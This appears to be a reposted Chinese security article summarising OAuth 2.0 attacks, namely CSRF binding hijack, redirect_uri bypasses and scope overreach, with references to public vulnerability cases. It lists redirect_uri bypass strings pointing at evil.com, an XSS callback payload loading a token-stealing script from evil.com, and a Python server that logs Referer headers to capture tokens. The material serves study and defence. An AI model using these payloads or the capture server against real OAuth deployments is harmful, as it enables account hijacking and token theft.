OAuth流程

本文以兩種廣泛使用的方案為標(biāo)準(zhǔn)展開。

如對(duì)流程不了解，請(qǐng)先移步學(xué)習(xí):理解OAuth 2.0

Authorization Code

? response_type = code

? redirect_uri

? scope

? client_id

? state

Implicit

? response_type = token

? redirect_uri

? scope

? client_id

? state

攻擊面

(1).CSRF導(dǎo)致綁定劫持

(2).redirect_uri繞過導(dǎo)致授權(quán)劫持

(3).scope越權(quán)訪問

綁定劫持

? 攻擊者抓取認(rèn)證請(qǐng)求構(gòu)造惡意url，并誘騙已經(jīng)登錄的網(wǎng)用戶點(diǎn)擊(比如通過郵件或者QQ等方式).認(rèn)證成功后用戶的賬號(hào)會(huì)同攻擊者的賬號(hào)綁定到一起。

OAuth 2.0提供了state參數(shù)用于防御CSRF。認(rèn)證服務(wù)器在接收到的state參數(shù)按原樣返回給redirect_uri,客戶端收到該參數(shù)并驗(yàn)證與之前生成的值是否一致。除此方法外也可使用傳統(tǒng)的CSRF防御方案。

案例:人人網(wǎng)-百度OAuth 2.0 redirect_uir CSRF 漏洞

授權(quán)劫持

根據(jù)OAuth的認(rèn)證流程，用戶授權(quán)憑證會(huì)由服務(wù)器轉(zhuǎn)發(fā)到redirect_uri對(duì)應(yīng)的地址，如果攻擊者偽造redirect_uri為自己的地址，然后誘導(dǎo)用戶發(fā)送該請(qǐng)求，之后獲取的憑證就會(huì)發(fā)送給攻擊者偽造的回調(diào)地址。攻擊者使用該憑證即可登錄用戶賬號(hào)，造成授權(quán)劫持。

正常情況下，為了防止該情況出現(xiàn)，認(rèn)證服務(wù)器會(huì)驗(yàn)證自己的client_id與回調(diào)地址是否對(duì)應(yīng)。常見的方法是驗(yàn)證回調(diào)地址的主域，涉及到的突破方式與CSRF如出一轍:

未驗(yàn)證

(1) 未驗(yàn)證的情況，可以直接跳出外域。

? 案例:土豆網(wǎng)某處認(rèn)證缺陷可劫持oauth_token

驗(yàn)證繞過

• auth.app.com.evil.com
• evil.com?auth.app.com
• evil.com?@auth.app.com 案例:騰訊OAuth平臺(tái) redirect_uri 過濾不嚴(yán)可能導(dǎo)致用戶信息遭竊取（二）
• auth.app.com@evil.com?案例:繞過網(wǎng)易o(hù)auth認(rèn)證的redirect_uri限制劫持帳號(hào)token
• auth.app.com\@evil.com 案例:騰訊OAuth平臺(tái)redirect_uri過濾不嚴(yán)可能導(dǎo)致用戶信息遭竊取（四）
• evil.com\auth.app.com
• evil.com:\auth.app.com
• evil.com\.auth.app.com 案例:騰訊OAuth平臺(tái)redirect_uri過濾不嚴(yán)可能導(dǎo)致用戶信息遭竊取
• evil.com:\@auth.app.com 案例:新浪微博OAuth平臺(tái)redirect_uri過濾不嚴(yán)可能導(dǎo)致用戶信息遭竊取
• 寬字符繞過 案例:?騰訊OAuth平臺(tái)redirect_uri過濾不嚴(yán)可能導(dǎo)致用戶信息遭竊取（三）

子域可控

(1) 對(duì)回調(diào)地址驗(yàn)證了主域?yàn)閍pp.com,但其子域evil.app.com可被任意用戶注冊(cè)使用。

案例:新浪微博部分App Oauth2漏洞

跨域

(1) 利用可信域的url跳轉(zhuǎn)從referer偷取token

如果網(wǎng)站存在一個(gè)任意url跳轉(zhuǎn)漏洞，可利用該漏洞構(gòu)造一下向量

redirect_uri=http://auth.app.com/redirect.php?url=http://evil.com

認(rèn)證服務(wù)器將憑證通過GET方法發(fā)送到redirect.php,這時(shí)redirect.php執(zhí)行跳轉(zhuǎn)，訪問http://evil.com,攻擊者為evil.com記錄日志，并從請(qǐng)求頭中的referer字段提取出該憑證，即可通過該憑證進(jìn)行授權(quán)登錄。

(2)利用跨域請(qǐng)求從referer偷取token

在我們不能繞過redirect_uri的判斷規(guī)則時(shí)，我們可以使利用跨域請(qǐng)求從referer中偷取token。

例1 redirect_uri限制為app.com,然而app.com/article/1.html中允許用戶發(fā)表文章，在文章中嵌入來自evil.com的外部圖片。這時(shí)我們可以讓redirect_uri指向該文章app.com/article/1.html,當(dāng)該文章被訪問時(shí)，會(huì)自動(dòng)獲取evil.com/test.jpg,這時(shí)攻擊者即可從請(qǐng)求頭的referer拿到token

例2 利用XSS實(shí)現(xiàn)跨域

redirect_uri=http://app.com/ajax/cat.html?callback=<script src="http://evil.com?getToken.php"></script>

越權(quán)訪問

這個(gè)案例展示了scope權(quán)限控制不當(dāng)帶來的安全風(fēng)險(xiǎn)，同時(shí)將授權(quán)劫持的幾個(gè)方面演繹的淋漓盡致。

案例:從“黑掉Github”學(xué)Web安全開發(fā)

輔助驗(yàn)證腳本

一個(gè)簡易服務(wù)器，會(huì)記錄來訪者的請(qǐng)求頭。

1.python picserver.py【可選端口號(hào)】

2.打開瀏覽器訪問圖片或頁面地址

3.查看日志

4.清除日志

import BaseHTTPServer import datetime import sys import osSERVER = '0.0.0.0' PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 2333 LOG_PATH = 'reqlog.txt'class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):def do_GET(self):if '.png' in self.path:print self.pathfname = '1.png'elif '.jpg' in self.path:fname = '1.jpg'elif '.gif' in self.path:fname = '1.gif'elif '.html' in self.path:fname = 'index.html'elif 'clear' in self.path:os.remove(LOG_PATH)self.send_response(200)self.end_headers()self.wfile.write('ok')returnelse:self.send_response(200)self.end_headers()try:self.wfile.write(open(LOG_PATH, 'r').read())except IOError:print '[*]Create logfile: ' + LOG_PATHreturnmessage_parts = ['<br>===== [%s] %s =====' % (self.path, datetime.datetime.today())]for name, value in sorted(self.headers.items()):message_parts.append('%s: %s' % (name, value.strip()))message = '<br>'.join(message_parts) + '<br>'with open(LOG_PATH, 'a') as f:f.write(message)self.send_response(200)self.end_headers()self.wfile.write(open(fname, 'rb').read())print '[*]Starting server at %s:%d' % (SERVER, PORT) server = BaseHTTPServer.HTTPServer((SERVER, PORT), WebRequestHandler) server.serve_forever()

效果:

參考

• 理解OAuth 2.0 - 阮一峰
• 從“黑掉Github”學(xué)Web安全開發(fā) - 陳皓
• 知乎網(wǎng)站安全滲透測(cè)試報(bào)告 - CplusHua
• 利用OAuth劫持用戶身份(Kcon 2014) - 藍(lán)色di雪球
• 烏云已公開漏洞

總結(jié)

以上是生活随笔為你收集整理的OAuth 2.0攻击方法及案例总结的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。